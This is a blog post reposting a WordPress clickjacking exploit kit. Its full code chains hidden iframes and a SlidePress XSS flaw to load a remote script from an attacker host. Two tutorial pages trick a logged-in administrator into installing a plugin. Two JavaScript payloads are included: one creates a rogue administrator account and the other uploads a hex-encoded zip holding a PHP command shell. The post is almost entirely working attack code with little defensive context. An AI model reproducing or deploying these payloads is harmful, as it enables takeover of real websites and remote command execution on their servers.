25 January 2012

Wordpress Clickjack Exploit

0
07:17 in ,






Clickjacking For Shells

How is it works? 
Full explanation PDF ==> ClickMe
What we need?
Check all the above files...
clickjack.php



PHP Code:
<!--
WordPress Example Exploit #3 (Chains SlidePress XSS with JS Payloads)
WordPress versions 3.1.2 and lower are vulnerable.
by Andrew Horton aka urbanadventurer
-->
<html>
<head>
<title>Clickjack Exploit for WordPress v3 by urbanadventurer</title>
</head>
<body>

<?
$wp_host="http://wordpress";$wp_path="/";$wp_plugin="slidepress";$wp_payload_js="http://hax0r/wordpress-upload-shell-payload.js";?>
<style>
#outerdiv {
width:100px; height:30px; overflow:hidden;
z-index:10; opacity:0;
position:absolute; top:135px; left:445px;
}

.stage2 {
opacity:0;
}

#para { width:550px; }

.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }
</style>

<h1>WordPress Clickjack Exploit v3</h1>

<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>

<div id="outerdiv" >
<iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,
<style>
.inneriframe {
position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none;
}
</style>

<script>
var load_count=0;

function frameloaded() {
    load_count=load_count+1;
    if (load_count==2) {
        ex();
    }
}

function ex() {
    top.document.getElementById('stage2').src='<? echo $wp_host.$wp_path?>wp-content/plugins/<? echo $wp_plugin?>/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=<? echo $wp_payload_js?>?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=<? echo $wp_path?>&a=></if'+'rame>';
}
</script>
<iframe id='inneriframe' class='inneriframe' onload='frameloaded();' name='_parent' scrolling='no'
src='<? echo $wp_host.$wp_path?>wp-admin/plugin-install.php?tab=plugin-information&plugin=<? echo $wp_plugin?>&TB_iframe=true&width=600&height=581'>
</iframe>
"></iframe>
</div>
<iframe class='stage2' style='height:0px;width:0px;' id='stage2'> </iframe>

</body>
</html>
index-1.html
PHP Code:
<html>  <head><title>Clickjack Exploit for WordPress v1</title></head> <body> <style#outerdiv { width:100px; height:30px; overflow:hidden;  z-index:10; opacity:0;  position:absolute; top:135px; left:445px;  }  #inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; } #para { width:650px; } .clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; } </style>  <h1>WordPress Clickjack Exploit v1</h1>  <p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p> <div class='clickjack'><a href='#'>read more</a></div>  <div id="outerdiv" > <iframe id="inneriframe" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581"> </iframe> </div>  <p id="para" style="margin-top:50px;"> An Install Now button is hidden in front of the 'read more' link. When clicked, this will install a WordPress plugin. After installation, the user is redirected to a page acknowledging the new plugin.</p>  <p>The hidden iframe contains : <a href="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581</a> </p>  </body> </html>  

index-2.html
PHP Code:
<html>  <head><title>Clickjack Exploit for WordPress v2</title></head> <body> <style#outerdiv { width:100px; height:30px; overflow:hidden;  z-index:10; opacity:0;  position:absolute; top:135px; left:445px;  }  #para { width:650px; } .clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; } </style>  <h1>WordPress Clickjack Exploit v2</h1>  <p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p> <div class='clickjack'><a href='#'>read more</a></div>  <div id="outerdiv"> <iframe src="index-2-inner.html"> </iframe> </div>   <p id="para" style="margin-top:50px;"> An Install Now button is hidden infront of the 'read more' link. When clicked, this will install a WordPress plugin. After installation, the user is not redirected to a page acknowledging the new plugin.</p>  <p>The hidden iframe contains : <a href="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581</a> </p>  </body> </html>  
index-2-inner.html
PHP Code:
<style#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; /* removes borders of iframes, grey horizontal and vertical lines in firefox*/ } </style>  <iframe id="inneriframe" name="_parent" scrolling="no"  src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581"> wordpress </iframe>  
wordpress-add-admin-payload.js 
Code:
/*
WordPress JavaScript Exploit Payload to Create an Admin User
Known to work with WordPress version 3.1.2
by Andrew Horton aka urbanadventurer
*/

path_to_wp = "/wordpress-2.9.2";
new_username="alpha4";
new_password="alpha004";
new_email="alpha4%40mailinator.com"; // %40 for @

xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",path_to_wp + "/wp-admin/user-new.php",true);

xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {
            response=xmlhttp.responseText;
            nonce=response.split('hidden" id="_wpnonce')[1];
            nonce=nonce.split('"')[4];

            xmlhttp.open("POST", path_to_wp + "/wp-admin/user-new.php",true);
            xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

            post_data="_wpnonce=" + nonce + "&action=adduser&user_login="+ new_username + "&first_name=&last_name=&email=" +
new_email + "&url=&pass1=" + new_password + "&pass2=" + new_password + "&role=administrator&adduser=Add+User"
            xmlhttp.setRequestHeader("Content-Length",post_data.length);
            xmlhttp.send(post_data);
    }
}

xmlhttp.send(null);
wordpress-upload-shell-payload.js
Code:
/*
WordPress JavaScript Exploit Payload to Create an Admin User
Known to work with WordPress version 3.1.2
by Andrew Horton1

Uploads a PHP Shell.
Example: http://wordpress/wp-content/plugins/shell/shell.php?cmd=ls
*/

var nonce;
function gup( name )
{
  name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
  var regexS = "[\\?&]"+name+"=([^&#]*)";
  var regex = new RegExp( regexS );
  var results = regex.exec( window.location.href );
  if( results == null )
     return "";
  else
     return results[1];
}

// window.location should contain &wp_path=
path_to_wp = gup('wp_path');

xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",path_to_wp + "wp-admin/plugin-install.php?tab=upload",true);

xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {

        response=xmlhttp.responseText;
        nonce=response.split('hidden" id="_wpnonce')[1];
        nonce=nonce.split('"')[4];
        
        xmlhttp.open("POST", path_to_wp + "wp-admin/update.php?action=upload-plugin",true);
        
        xmlhttp.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------304661183327760");

        // shell.zip contains
        // shell.php which is <? passthru($_REQUEST['cmd']); ?>
        
post_data="-----------------------------304661183327760\r\n"+
"Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n"+
nonce + "\r\n"+
"-----------------------------304661183327760\r\n"+
"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n"+
path_to_wp + "wp-admin/plugin-install.php?tab=upload\r\n"+
"-----------------------------304661183327760\r\n"+
"Content-Disposition: form-data; name=\"pluginzip\";\r\n"+
"filename=\"shell.zip\"\r\n"+
"Content-Type: application/octet-stream\r\n\r\n";

            post_data=post_data+"\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00\x00\x22\x00\x00\x00\x09\x00\x00\x00\x73\x68\x65\x6c\x6c\x2e\x70\x68\x70\x3c\x3f\x20\x70\x61\x73\x73\x74\x68\x72\x75\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00\x00\x22\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x00\x00\x00\x00\x00\x00\x73\x68\x65\x6c\x6c\x2e\x70\x68\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x37\x00\x00\x00\x49\x00\x00\x00\x00\x00\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x33\x30\x34\x36\x36\x31\x31\x38\x33\x33\x32\x37\x37\x36\x30\x2d\x2d\x0d\x0a";
        
        xmlhttp.setRequestHeader("Content-Length",post_data.length);        
        xmlhttp.sendAsBinary(post_data);
    }
}        

xmlhttp.send(null);
Files:
clickjack.php - The final clickjacking exploit
index-1.html - Tutorial 1 of how to exploit clickjacking
index-2.html - Tutorial 2 of how to exploit clickjacking
index-2-inner.html - Part of Tutorial 2
wordpress-add-admin-payload.js - Cross Site Scripting (XSS) Payload
wordpress-upload-shell-payload.js - Cross Site Scripting (XSS) Payload 

wordpress-clickjack.zip
 Special Thanks to:
aB

Posted by тяσנαη нα¢кєя

0 comments:

Post a Comment

 
Design by Abubaker Javed | Email:abubaker.javed@aol.com | Phone:+92-301-5194008 |GujranwalaFun@aol.com

Followers